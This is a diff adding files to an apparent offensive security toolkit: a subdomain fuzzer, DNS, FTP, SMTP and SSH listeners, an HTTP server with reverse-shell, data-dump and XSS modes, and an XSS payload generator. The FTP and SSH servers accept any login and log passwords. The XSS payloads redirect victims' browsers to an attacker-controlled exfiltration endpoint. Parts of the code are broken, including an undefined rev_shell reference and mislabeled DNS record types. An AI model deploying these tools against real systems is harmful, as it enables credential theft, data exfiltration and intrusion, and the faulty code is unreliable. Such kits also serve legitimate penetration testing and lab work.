print(f"[+] {label.text} differs. local={local.text} master={master.text}")
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: %s <url>", sys.argv[0])
|
||||
else:
|
||||
url = sys.argv[1]
|
||||
res = requests.get(url)
|
||||
if res.status_code != 200:
|
||||
print("[-] Server returned:", res.status_code, res.reason)
|
||||
else:
|
||||
soup = BeautifulSoup(res.text, "html.parser")
|
||||
analyze(soup)
|
||||
57
tools/scanner/subdomainFuzz.sh
Executable file
57
tools/scanner/subdomainFuzz.sh
Executable file
@@ -0,0 +1,57 @@
|
||||
#!/bin/bash
|
||||
|
||||
if [ $# -lt 1 ]; then
|
||||
echo "Invalid usage: $0 <domain>"
|
||||
exit
|
||||
fi
|
||||
|
||||
DOMAIN=$1
|
||||
PROTOCOL="http"
|
||||
|
||||
if [[ $DOMAIN = https://* ]]; then
|
||||
PROTOCOL="https"
|
||||
fi
|
||||
|
||||
DOMAIN=$(echo $DOMAIN | sed -e 's|^[^/]*//||' -e 's|/.*$||')
|
||||
|
||||
if [ $# -lt 2 ]; then
|
||||
echo "[ ] Resolving IP-Address…"
|
||||
output=$(resolveip $DOMAIN 2>&1)
|
||||
status=$(echo $?)
|
||||
if ! [[ $status == 0 ]] ; then
|
||||
echo "[-] ${output}"
|
||||
exit
|
||||
fi
|
||||
IP_ADDRESS=$(echo $output | head -n 1 | awk '{print $NF}')
|
||||
echo "[+] IP-Address: ${IP_ADDRESS}"
|
||||
else
|
||||
IP_ADDRESS=$2
|
||||
echo "[+] Using IP-Address: ${IP_ADDRESS}"
|
||||
fi
|
||||
|
||||
function sni () {
|
||||
protocol=$1
|
||||
sni=$2
|
||||
if ! [[ "$sni" =~ ".*:[0-9]+" ]]; then
|
||||
if [[ $protocol == "https" ]]; then
|
||||
sni="$sni:443"
|
||||
else
|
||||
sni="$sni:80"
|
||||
fi
|
||||
fi
|
||||
|
||||
echo $sni
|
||||
}
|
||||
|
||||
echo "[ ] Retrieving default site…"
|
||||
rnd=$(uuidgen)
|
||||
sni=$(sni ${PROTOCOL} ${rnd}.${DOMAIN})
|
||||
charcountIpAddress=$(curl -s "${PROTOCOL}://${IP_ADDRESS}" -k -m 5 | wc -m)
|
||||
charcountNonExistent=$(curl -s "${PROTOCOL}://${rnd}.${DOMAIN}" --resolve "${sni}:${IP_ADDRESS}" -k -m 5 | wc -m)
|
||||
charcountDomain=$(curl -s "${PROTOCOL}://${DOMAIN}" -k -m 5 | wc -m)
|
||||
echo "[+] Chars: ${charcountDomain}, ${charcountIpAddress}, ${charcountNonExistent}"
|
||||
echo "[ ] Fuzzing…"
|
||||
|
||||
(set -x; ffuf --fs ${charcountDomain},${charcountIpAddress},${charcountNonExistent} --fc 400 --mc all \
|
||||
-w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt \
|
||||
-u "${PROTOCOL}://${DOMAIN}" -H "Host: FUZZ.${DOMAIN}" "${@:2}")
|
||||
145
tools/server/dnsserver.py
Executable file
145
tools/server/dnsserver.py
Executable file
@@ -0,0 +1,145 @@
|
||||
#!/usr/bin/env python
|
||||
# coding=utf-8
|
||||
|
||||
import argparse
|
||||
import datetime
|
||||
import sys
|
||||
import time
|
||||
import threading
|
||||
import traceback
|
||||
import socketserver
|
||||
import struct
|
||||
|
||||
try:
|
||||
from dnslib import *
|
||||
except ImportError:
|
||||
print("Missing dependency dnslib: <https://pypi.python.org/pypi/dnslib>. Please install it with `pip`.")
|
||||
sys.exit(2)
|
||||
|
||||
|
||||
class DnsServer:
|
||||
|
||||
class BaseRequestHandler(socketserver.BaseRequestHandler):
|
||||
|
||||
def get_data(self):
|
||||
raise NotImplementedError
|
||||
|
||||
def send_data(self, data):
|
||||
raise NotImplementedError
|
||||
|
||||
def handle(self):
|
||||
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
|
||||
try:
|
||||
data = self.get_data()
|
||||
self.send_data(self.server.server.dns_response(data))
|
||||
except Exception:
|
||||
traceback.print_exc(file=sys.stderr)
|
||||
|
||||
class TCPReqImpl(BaseRequestHandler):
|
||||
|
||||
def get_data(self):
|
||||
data = self.request.recv(8192).strip()
|
||||
sz = struct.unpack('>H', data[:2])[0]
|
||||
if sz < len(data) - 2:
|
||||
raise Exception("Wrong size of TCP packet")
|
||||
elif sz > len(data) - 2:
|
||||
raise Exception("Too big TCP packet")
|
||||
return data[2:]
|
||||
|
||||
def send_data(self, data):
|
||||
sz = struct.pack('>H', len(data))
|
||||
return self.request.sendall(sz + data)
|
||||
|
||||
class UDPReqImpl(BaseRequestHandler):
|
||||
|
||||
def get_data(self):
|
||||
return self.request[0].strip()
|
||||
|
||||
def send_data(self, data):
|
||||
return self.request[1].sendto(data, self.client_address)
|
||||
|
||||
class UDPImpl(socketserver.ThreadingUDPServer):
|
||||
|
||||
def __init__(self, server):
|
||||
super().__init__((server.bind_addr, server.listen_port), DnsServer.UDPReqImpl)
|
||||
self.server = server
|
||||
|
||||
class TCPImpl(socketserver.ThreadingTCPServer):
|
||||
|
||||
def __init__(self, server):
|
||||
super().__init__((server.bind_addr, server.listen_port), DnsServer.TCPReqImpl)
|
||||
self.server = server
|
||||
|
||||
def __init__(self, addr, port=53):
|
||||
self.bind_addr = addr
|
||||
self.listen_port = port
|
||||
self.sockets = []
|
||||
self.threads = []
|
||||
self.sockets.append(DnsServer.UDPImpl(self))
|
||||
self.sockets.append(DnsServer.TCPImpl(self))
|
||||
self.entries = { "A": {}, "AAAA": {}, "MX": {}, "TXT": {}, "NS": {} }
|
||||
self.debug = False
|
||||
self.ttl = 60 * 5
|
||||
self.logging = False
|
||||
self.not_found_handler = None
|
||||
|
||||
def addEntry(self, type, domain, value):
|
||||
if type not in self.entries:
|
||||
print("Invalid type, must be one of:", self.entries.keys())
|
||||
return False
|
||||
|
||||
if not domain.endswith("."):
|
||||
domain += "."
|
||||
|
||||
if type in ["A","MX","NS"]:
|
||||
value = A(value)
|
||||
elif type in ["AAAA"]:
|
||||
value = AAAA(value)
|
||||
elif type in ["TXT"]:
|
||||
value = CNAME(value)
|
||||
|
||||
if self.debug:
|
||||
print(f"Added entry: {type} {domain} => {value}")
|
||||
|
||||
self.entries[type][domain] = value
|
||||
return True
|
||||
|
||||
def startBackground(self):
|
||||
for socket in self.sockets:
|
||||
t = threading.Thread(target=socket.serve_forever)
|
||||
t.start()
|
||||
self.threads.append(t)
|
||||
|
||||
def start(self):
|
||||
self.startBackground()
|
||||
map(lambda t: t.join(), self.threads)
|
||||
|
||||
def stop(self):
|
||||
map(lambda s: s.shutdown(), self.sockets)
|
||||
map(lambda t: t.join(), self.threads)
|
||||
|
||||
def dns_response(self, data):
|
||||
request = DNSRecord.parse(data)
|
||||
|
||||
if self.debug:
|
||||
print("DNS REQUEST:", request)
|
||||
|
||||
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
|
||||
qname = request.q.qname
|
||||
qn = str(qname)
|
||||
qtype = request.q.qtype
|
||||
qt = QTYPE[qtype]
|
||||
|
||||
if qt in self.entries and qn in self.entries[qt]:
|
||||
entry = self.entries[qt][qn]
|
||||
rqt = entry.__class__.__name__
|
||||
reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=self.ttl, rdata=entry))
|
||||
if self.logging:
|
||||
print(f"Request: {qt} {qn} -> {entry}")
|
||||
elif self.not_found_handler:
|
||||
self.not_found_handler(request, reply)
|
||||
|
||||
if self.debug:
|
||||
print("DNS RESPONSE:", reply)
|
||||
|
||||
return reply.pack()
|
||||
181
tools/server/ftpserver.py
Executable file
181
tools/server/ftpserver.py
Executable file
@@ -0,0 +1,181 @@
|
||||
import os
|
||||
import logging
|
||||
import argparse
|
||||
import signal
|
||||
from pyftpdlib.handlers import FTPHandler
|
||||
from pyftpdlib.servers import ThreadedFTPServer
|
||||
from pyftpdlib.authorizers import DummyAuthorizer
|
||||
|
||||
logger = logging.getLogger()
|
||||
logger.setLevel(logging.INFO)
|
||||
|
||||
stream_handler = logging.StreamHandler()
|
||||
stream_handler.setLevel(logging.INFO)
|
||||
|
||||
formatter = logging.Formatter("%(asctime)s - %(message)s")
|
||||
stream_handler.setFormatter(formatter)
|
||||
|
||||
logger.addHandler(stream_handler)
|
||||
|
||||
MSG_LOGIN = "Login successful"
|
||||
MSG_CLOSE = "Goodbye"
|
||||
|
||||
|
||||
# Class to log every action the user takes
|
||||
class CustomFTPHandler(FTPHandler):
|
||||
def on_login(self, username):
|
||||
logging.info(f"User '{username}' logged in successfully.")
|
||||
|
||||
def on_login_failed(self, username, password):
|
||||
logging.warning(
|
||||
f"Failed login attempt for user '{username}' with password '{password}'."
|
||||
)
|
||||
|
||||
def on_file_received(self, file):
|
||||
logging.info(f"File received: {file}")
|
||||
|
||||
def on_file_sent(self, file):
|
||||
logging.info(f"File sent: {file}")
|
||||
|
||||
def on_file_deleted(self, file):
|
||||
logging.info(f"File deleted: {file}")
|
||||
|
||||
def on_file_renamed(self, old_file, new_file):
|
||||
logging.info(f"File renamed from '{old_file}' to '{new_file}'")
|
||||
|
||||
def on_file_downloaded(self, file):
|
||||
logging.info(f"File downloaded: {file}")
|
||||
|
||||
def on_file_stored(self, file):
|
||||
logging.info(f"File stored: {file}")
|
||||
|
||||
def on_file_retrieved(self, file):
|
||||
logging.info(f"File retrieved: {file}")
|
||||
|
||||
def on_file_aborted(self, file):
|
||||
logging.info(f"File transfer aborted: {file}")
|
||||
|
||||
def on_file_changed(self, file):
|
||||
logging.info(f"File changed: {file}")
|
||||
|
||||
def on_file_moved(self, old_file, new_file):
|
||||
logging.info(f"File moved from '{old_file}' to '{new_file}'")
|
||||
|
||||
def on_file_uploaded(self, file):
|
||||
logging.info(f"File uploaded: {file}")
|
||||
|
||||
def on_connect(self):
|
||||
logger.info(f"Client connected: {self.remote_ip}")
|
||||
|
||||
def on_disconnect(self):
|
||||
logger.info(f"Client disconnected: {self.remote_ip}")
|
||||
|
||||
def on_logout(self, username):
|
||||
logger.info(f"User logged out: {username}")
|
||||
|
||||
def on_incomplete_file_received(self, file):
|
||||
logger.warning(f"Incomplete file received: {file}")
|
||||
|
||||
def on_incomplete_file_sent(self, file):
|
||||
logger.warning(f"Incomplete file received: {file}")
|
||||
|
||||
|
||||
class AnyUserAuthorizer(DummyAuthorizer):
|
||||
"""
|
||||
Authorization class that allows any combination of username/password.
|
||||
"""
|
||||
|
||||
def __init__(self, directory):
|
||||
DummyAuthorizer.__init__(self)
|
||||
self.directory = directory
|
||||
self.default_params = {
|
||||
"pwd": "",
|
||||
"home": self.directory,
|
||||
"perm": "elr",
|
||||
"operms": {},
|
||||
"msg_login": MSG_LOGIN,
|
||||
"msg_quit": MSG_CLOSE,
|
||||
}
|
||||
|
||||
def validate_authentication(self, username, password, handler):
|
||||
logger.info(f"User '{username}' tried logging in with password: '{password}'")
|
||||
|
||||
return True
|
||||
|
||||
def get_home_dir(self, username):
|
||||
return self.directory
|
||||
|
||||
def has_user(self, username):
|
||||
if username in self.user_table:
|
||||
return True
|
||||
|
||||
self.add_user(username, "", self.directory)
|
||||
return True
|
||||
|
||||
def has_perm(self, username, perm, path=None) -> bool:
|
||||
if username not in self.user_table:
|
||||
# add user manually and not via add_user due to infinite recursion
|
||||
self.user_table[username] = self.default_params
|
||||
|
||||
return True
|
||||
|
||||
def get_msg_login(self, username: str) -> str:
|
||||
return MSG_LOGIN
|
||||
|
||||
def get_msg_quit(self, username: str) -> str:
|
||||
return MSG_CLOSE
|
||||
|
||||
|
||||
class FastFTPServer:
|
||||
def __init__(self, directory, port):
|
||||
self.directory = directory
|
||||
self.port = port
|
||||
self.server = None
|
||||
|
||||
def start(self):
|
||||
authorizer = AnyUserAuthorizer(directory=self.directory)
|
||||
|
||||
handler = CustomFTPHandler
|
||||
handler.authorizer = authorizer
|
||||
|
||||
self.server = ThreadedFTPServer(("", self.port), handler)
|
||||
logging.info(f"Starting FTP server on port {self.port}")
|
||||
|
||||
self.server.serve_forever()
|
||||
|
||||
def cleanup(self):
|
||||
logging.info("Shutting down FTP server...")
|
||||
if self.server:
|
||||
self.server.close_all()
|
||||
logging.info("FTP server shut down.")
|
||||
|
||||
|
||||
def signal_handler(sig, frame):
|
||||
logging.info("Received Ctrl+C, shutting down...")
|
||||
ftp_server.cleanup()
|
||||
exit(0)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Temporary FTP Server")
|
||||
parser.add_argument(
|
||||
"--dir", "-d", type=str, default=".", help="Directory to serve files from"
|
||||
)
|
||||
parser.add_argument(
|
||||
"--port", "-p", type=int, default=21, help="Port to run the FTP server on"
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if not os.path.exists(args.dir):
|
||||
print(f"Error: The directory '{args.dir}' does not exist.")
|
||||
return
|
||||
|
||||
global ftp_server
|
||||
ftp_server = FastFTPServer(args.dir, args.port)
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
ftp_server.start()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
40
tools/server/smtpserver.py
Executable file
40
tools/server/smtpserver.py
Executable file
@@ -0,0 +1,40 @@
|
||||
import smtpd
|
||||
import email
|
||||
import asyncore
|
||||
import threading
|
||||
|
||||
class SMTPServer(smtpd.SMTPServer):
|
||||
|
||||
def __init__(self, addr='0.0.0.0', port=25):
|
||||
super().__init__((addr, port), None)
|
||||
self.listen_thread = None
|
||||
self.verbose = False
|
||||
self.on_message = None
|
||||
self.is_running = True
|
||||
|
||||
def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
|
||||
if self.verbose:
|
||||
print(f"SMTP IN: {peer=} {mailfrom=} {rcpttos=} {len(data)} bytes, extra:", kwargs)
|
||||
if self.on_message and callable(self.on_message):
|
||||
mail = email.message_from_bytes(data)
|
||||
self.on_message(peer, mailfrom, rcpttos, mail)
|
||||
|
||||
def start(self):
|
||||
if self.verbose:
|
||||
print(f"SMTP server running on: {self._localaddr[0]}:{self._localaddr[1]}")
|
||||
try:
|
||||
while self.is_running:
|
||||
asyncore.loop(timeout=1, use_poll=True)
|
||||
except KeyboardInterrupt:
|
||||
self.close()
|
||||
|
||||
def start_background(self):
|
||||
self.listen_thread = threading.Thread(target=self.start)
|
||||
self.listen_thread.start()
|
||||
return self.listen_thread
|
||||
|
||||
def stop(self):
|
||||
self.is_running = False
|
||||
self.close()
|
||||
if self.listen_thread:
|
||||
self.listen_thread.join()
|
||||
90
tools/server/sshserver.py
Executable file
90
tools/server/sshserver.py
Executable file
@@ -0,0 +1,90 @@
|
||||
import socket
|
||||
import select
|
||||
import threading
|
||||
import paramiko
|
||||
|
||||
class ParamikoConnection(paramiko.ServerInterface):
|
||||
def __init__(self, server):
|
||||
self.event = threading.Event()
|
||||
self.server = server
|
||||
|
||||
def check_channel_request(self, kind, chanid):
|
||||
print("check_channel_request", kind, chanid)
|
||||
if kind == 'session':
|
||||
return paramiko.OPEN_SUCCEEDED
|
||||
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
|
||||
|
||||
def check_auth_password(self, username, password):
|
||||
if self.server.on_ssh_login:
|
||||
return self.server.on_ssh_login(username, password)
|
||||
|
||||
print("check_auth_password", username, password)
|
||||
return paramiko.AUTH_SUCCESSFUL
|
||||
|
||||
class SSHServer:
|
||||
|
||||
def __init__(self, addr='0.0.0.0', port=22):
|
||||
self.server_address = addr
|
||||
self.listen_port = port
|
||||
self.listen_socket = None
|
||||
self.listen_thread = None
|
||||
self.client_sockets = []
|
||||
self.transports = []
|
||||
self.verbose = True
|
||||
self.on_message = None
|
||||
self.is_running = True
|
||||
self.private_key = None
|
||||
|
||||
# hooks
|
||||
self.on_ssh_login = None
|
||||
|
||||
|
||||
def load_private_key_from_file(self, path):
|
||||
with open(path, "r") as f:
|
||||
self.private_key = paramiko.RSAKey.from_private_key(f)
|
||||
|
||||
def start(self):
|
||||
|
||||
if self.private_key is None:
|
||||
self.private_key = paramiko.RSAKey.generate(2048)
|
||||
|
||||
self.listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
self.listen_socket.setblocking(False)
|
||||
self.listen_socket.bind((self.server_address, self.listen_port))
|
||||
self.listen_socket.listen()
|
||||
if self.verbose:
|
||||
print(f"SSH server running on: {self.server_address}:{self.listen_port}")
|
||||
try:
|
||||
while self.is_running:
|
||||
try:
|
||||
client_socket, client_address = self.listen_socket.accept()
|
||||
if self.verbose:
|
||||
print("Incoming connection:", client_address)
|
||||
self.client_sockets.append(client_socket)
|
||||
transport = paramiko.Transport(client_socket)
|
||||
transport.add_server_key(self.private_key)
|
||||
paramiko_connection = ParamikoConnection(self)
|
||||
transport.start_server(server=paramiko_connection)
|
||||
self.transports.append(transport)
|
||||
|
||||
except BlockingIOError:
|
||||
pass
|
||||
finally:
|
||||
self.listen_socket.close()
|
||||
|
||||
def start_background(self):
|
||||
self.listen_thread = threading.Thread(target=self.start)
|
||||
self.listen_thread.start()
|
||||
return self.listen_thread
|
||||
|
||||
def close(self):
|
||||
if self.listen_socket:
|
||||
self.listen_socket.shutdown(socket.SHUT_RDWR)
|
||||
for sock in self.client_sockets:
|
||||
sock.close()
|
||||
|
||||
def stop(self):
|
||||
self.is_running = False
|
||||
self.close()
|
||||
if self.listen_thread:
|
||||
self.listen_thread.join()
|
||||
372
tools/server/webserver.py
Executable file
372
tools/server/webserver.py
Executable file
@@ -0,0 +1,372 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import argparse
|
||||
import threading
|
||||
import requests
|
||||
import time
|
||||
import os
|
||||
import ssl
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from urllib.parse import urlparse
|
||||
from hackingscripts.utils import util
|
||||
from hackingscripts.tools.server.xss_handler import generate_payload as generate_xss_payload
|
||||
|
||||
class FileServerRequestHandler(BaseHTTPRequestHandler):
|
||||
|
||||
def __init__(self, *args, **kwargs):
|
||||
super().__init__(*args, **kwargs)
|
||||
|
||||
def do_HEAD(self):
|
||||
self.do_GET()
|
||||
|
||||
def do_POST(self):
|
||||
self.do_GET()
|
||||
|
||||
def onForward(self, base_path, target, **kwargs):
|
||||
path = self.path[max(0, len(base_path)-1):]
|
||||
parts = urlparse(target)
|
||||
if path.startswith(parts.path):
|
||||
path = path[len(parts.path):]
|
||||
|
||||
target_rewrite = target + path
|
||||
|
||||
# queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
||||
# if queryStr:
|
||||
# target += "?" if "?" not in target else "&"
|
||||
# target += queryStr
|
||||
|
||||
content_length = self.headers.get('Content-Length')
|
||||
data = None
|
||||
|
||||
if content_length and int(content_length) > 0:
|
||||
data = self.rfile.read(int(content_length))
|
||||
|
||||
if "Host" in self.headers:
|
||||
del self.headers["Host"]
|
||||
|
||||
method = self.command
|
||||
print(target, "=>", method, target_rewrite)
|
||||
res = requests.request(method, target_rewrite, headers=self.headers, data=data, **kwargs)
|
||||
return res.status_code, res.content, res.headers
|
||||
|
||||
def read_body(self):
|
||||
if not hasattr(self, "body"):
|
||||
content_length = self.headers.get('Content-Length')
|
||||
if content_length and int(content_length) > 0:
|
||||
self.body = self.rfile.read(int(content_length))
|
||||
else:
|
||||
self.body = None
|
||||
|
||||
return self.body
|
||||
|
||||
def find_route(self, path):
|
||||
|
||||
if path in self.server.routes:
|
||||
return self.server.routes[path]
|
||||
|
||||
for p, route in self.server.prefix_routes.items():
|
||||
if path.startswith(p):
|
||||
return route
|
||||
|
||||
def not_found(req):
|
||||
return 404, b"", {}
|
||||
|
||||
return not_found
|
||||
|
||||
def do_OPTIONS(self):
|
||||
self.do_GET()
|
||||
|
||||
def do_GET(self):
|
||||
try:
|
||||
if not self.server.is_running:
|
||||
self.send_response(200)
|
||||
self.end_headers()
|
||||
return
|
||||
|
||||
path = self.server.cleanPath(self.path)
|
||||
route = self.find_route(path)
|
||||
result = route(self)
|
||||
|
||||
blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"]
|
||||
if isinstance(result, tuple):
|
||||
status_code = 200 if len(result) < 1 else result[0]
|
||||
data = b"" if len(result) < 2 else result[1]
|
||||
headers = { } if len(result) < 3 else result[2]
|
||||
elif isinstance(result, int):
|
||||
status_code = result
|
||||
data = b""
|
||||
headers = {}
|
||||
elif result is None:
|
||||
status_code = 201
|
||||
data = b""
|
||||
headers = {}
|
||||
else:
|
||||
status_code = 200
|
||||
data = data if type(data) in [bytes, bytearray] else str(data).encode()
|
||||
headers = {}
|
||||
|
||||
if path in self.server.dumpRequests:
|
||||
headers["Access-Control-Allow-Origin"] = "*"
|
||||
|
||||
headers["Connection"] = "Close"
|
||||
headers["Content-Length"] = len(util.nvl(data, b""))
|
||||
|
||||
if len(headers) == 0:
|
||||
self.send_response(status_code)
|
||||
else:
|
||||
if path != "/dummy":
|
||||
self.log_request(status_code)
|
||||
self.send_response_only(status_code)
|
||||
|
||||
for key, value in headers.items():
|
||||
if key.lower() not in blacklist_headers:
|
||||
self.send_header(key, value)
|
||||
|
||||
if self.command.upper() == "OPTIONS":
|
||||
self.send_header("Allow", "OPTIONS, GET, HEAD, POST")
|
||||
|
||||
self.end_headers()
|
||||
|
||||
if data and self.command.upper() not in ["HEAD","OPTIONS"]:
|
||||
if isinstance(data, str):
|
||||
data = data.encode()
|
||||
self.wfile.write(data)
|
||||
|
||||
if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy":
|
||||
body = self.read_body()
|
||||
|
||||
print("===== Connection from:",self.client_address[0])
|
||||
print("%s %s %s" % (self.command, self.path, self.request_version))
|
||||
print(str(self.headers).strip())
|
||||
if body:
|
||||
print()
|
||||
print(body)
|
||||
print("==========")
|
||||
except Exception as e:
|
||||
print("Exception on handling http", str(e))
|
||||
raise e
|
||||
|
||||
def log_message(self, format, *args):
|
||||
if self.server.logRequests:
|
||||
super().log_message(format, *args)
|
||||
|
||||
class HttpFileServer(HTTPServer):
|
||||
def __init__(self, addr, port):
|
||||
super().__init__((addr, port), FileServerRequestHandler)
|
||||
self.ssl_context = None
|
||||
self.logRequests = False
|
||||
self.routes = { }
|
||||
self.dumpRequests = []
|
||||
self.prefix_routes = { }
|
||||
self.is_running = True
|
||||
self.listen_thread = None
|
||||
|
||||
def cleanPath(self, path):
|
||||
if "?" in path:
|
||||
path = path[0:path.find("?")]
|
||||
|
||||
if not path.startswith("/"):
|
||||
path = "/" + path
|
||||
|
||||
return path.strip()
|
||||
|
||||
def addFile(self, name, data, mime_type=None):
|
||||
|
||||
assert isinstance(name, str)
|
||||
assert data is not None
|
||||
|
||||
if hasattr(data, "read"):
|
||||
fd = data
|
||||
data = data.read()
|
||||
fd.close()
|
||||
|
||||
if isinstance(data, str):
|
||||
data = data.encode("UTF-8")
|
||||
|
||||
headers = {
|
||||
"Access-Control-Allow-Origin": "*"
|
||||
}
|
||||
|
||||
if mime_type:
|
||||
headers["Content-Type"] = mime_type
|
||||
|
||||
# return 200 - OK and data
|
||||
self.addRoute(name, lambda req: (200, data, headers))
|
||||
|
||||
def add_file_path(self, path, name=None):
|
||||
def readfile():
|
||||
with open(path, "rb") as f:
|
||||
return f.read()
|
||||
|
||||
if name is None:
|
||||
name = os.path.basename(path)
|
||||
self.addRoute(name, lambda req: (200, readfile()))
|
||||
|
||||
def load_directory(self, path, recursive=True, exclude_ext=[]):
|
||||
if not os.path.isdir(path):
|
||||
print("Not a directory:", path)
|
||||
return
|
||||
|
||||
for dp, dn, filenames in os.walk(path):
|
||||
for f in filenames:
|
||||
file_path = os.path.join(dp, f)
|
||||
if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext:
|
||||
relative_path = file_path[len(path):]
|
||||
self.add_file_path(file_path, relative_path)
|
||||
|
||||
def dumpRequest(self, name):
|
||||
self.dumpRequests.append(self.cleanPath(name))
|
||||
|
||||
def addRoute(self, path, func):
|
||||
self.routes[self.cleanPath(path)] = func
|
||||
|
||||
def addPrefixRoute(self, path, func):
|
||||
self.prefix_routes[self.cleanPath(path)] = func
|
||||
|
||||
def forwardRequest(self, path, target, **kwargs):
|
||||
self.addPrefixRoute(path, lambda req: req.onForward(path, target, **kwargs))
|
||||
|
||||
def enableLogging(self):
|
||||
self.logRequests = True
|
||||
|
||||
def enableSSL(self, private_key="private.key", certificate="server.crt"):
|
||||
|
||||
if not os.path.isfile(private_key):
|
||||
print("Generating private key and certificate…")
|
||||
os.system(f"openssl req -new -x509 -keyout {private_key} -out {certificate} -days 365 -nodes")
|
||||
elif not os.path.isfile(certificate):
|
||||
print("Generating certificate…")
|
||||
os.system(f"openssl req -new -x509 -keyin {private_key} -out {certificate} -days 365 -nodes")
|
||||
|
||||
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
|
||||
self.ssl_context.load_cert_chain(certificate, private_key)
|
||||
self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)
|
||||
|
||||
def startBackground(self):
|
||||
self.listen_thread = threading.Thread(target=self.serve_forever)
|
||||
self.listen_thread.start()
|
||||
return self.listen_thread
|
||||
|
||||
def get_base_url(self, ip_addr=None):
|
||||
addr, port = self.server_address
|
||||
|
||||
if ip_addr is not None:
|
||||
addr = ip_addr
|
||||
|
||||
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
||||
if (int(port) == 80 and protocol == "http") or (int(port) == 443 and protocol == "https"):
|
||||
port = ""
|
||||
else:
|
||||
port = f":{port}"
|
||||
|
||||
return f"{protocol}://{addr}{port}"
|
||||
|
||||
def get_full_url(self, uri, ip_addr=None):
|
||||
if not uri.startswith("/"):
|
||||
uri = "/" + uri
|
||||
return self.get_base_url(ip_addr) + uri
|
||||
|
||||
def stop(self):
|
||||
self.is_running = False
|
||||
time.sleep(1)
|
||||
self.shutdown()
|
||||
if self.listen_thread != threading.currentThread():
|
||||
self.listen_thread.join()
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description="Spawn a temporary http server")
|
||||
parser.add_argument(
|
||||
"action",
|
||||
choices=["shell", "dump", "proxy", "xss", "start"],
|
||||
help="Choose one of these actions: shell, dump, proxy, xss, start"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--bind-address",
|
||||
type=str,
|
||||
default="0.0.0.0",
|
||||
dest="bind_addr",
|
||||
help="Address to bind on (default: 0.0.0.0)"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--port",
|
||||
type=int,
|
||||
default=9000,
|
||||
help="Port to bind on (default: 9000)"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--payload",
|
||||
type=str,
|
||||
default=None,
|
||||
help="Payload for xss / shell"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--ssl",
|
||||
action="store_true",
|
||||
default=False,
|
||||
help="Use HTTPS instead of HTTP"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--ssl-cert",
|
||||
dest="ssl_cert",
|
||||
type=str,
|
||||
default="server.crt",
|
||||
help="The certificate to use in combination with --ssl, default: server.crt"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--ssl-key",
|
||||
dest="ssl_key",
|
||||
type=str,
|
||||
default="private.key",
|
||||
help="The private key to use in combination with --ssl, default: private.key"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"-v",
|
||||
"--verbose",
|
||||
action="store_true",
|
||||
default=False,
|
||||
help="Verbose mode"
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
file_server = HttpFileServer(args.bind_addr, args.port)
|
||||
ip_address = util.get_address()
|
||||
|
||||
if args.ssl:
|
||||
file_server.enableSSL(args.ssl_key, args.ssl_cert)
|
||||
|
||||
if args.verbose:
|
||||
file_server.enableLogging()
|
||||
|
||||
if args.action == "shell":
|
||||
payload_type = args.payload if args.payload else "bash"
|
||||
shell_payload = rev_shell.generate_payload(args.payload, ip_address, 4444)
|
||||
file_server.addFile("/shell", rev_shell)
|
||||
print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
|
||||
elif args.action == "dump":
|
||||
file_server.dumpRequest("/")
|
||||
print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
|
||||
elif args.action == "proxy":
|
||||
url = "https://google.com"
|
||||
file_server.forwardRequest("/proxy", url)
|
||||
print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
|
||||
elif args.action == "xss":
|
||||
payload_type = args.payload if args.payload else "img"
|
||||
xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address))
|
||||
file_server.addFile("/xss", xss)
|
||||
file_server.dumpRequest("/exfiltrate")
|
||||
print("Exfiltrate data using:")
|
||||
print(xss)
|
||||
elif args.action == "start":
|
||||
file_server.load_directory(".")
|
||||
print("Serve files in current directory using:")
|
||||
print(file_server.get_full_url("/", ip_addr=ip_address))
|
||||
|
||||
file_server.serve_forever()
|
||||
71
tools/server/xss_handler.py
Executable file
71
tools/server/xss_handler.py
Executable file
@@ -0,0 +1,71 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
from hackingscripts import util
|
||||
from fileserver import HttpFileServer
|
||||
import argparse
|
||||
import random
|
||||
|
||||
def generate_payload(payload_type, url, index=None, **kwargs):
|
||||
payloads = []
|
||||
|
||||
media_tags = ["img","audio","video","image","body","script","object"]
|
||||
if payload_type in media_tags:
|
||||
payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url))
|
||||
|
||||
if payload_type == "script":
|
||||
payloads.append('<script type="text/javascript">document.location=%s</script>' % url)
|
||||
payloads.append('<script src="%s/xss" />' % url)
|
||||
|
||||
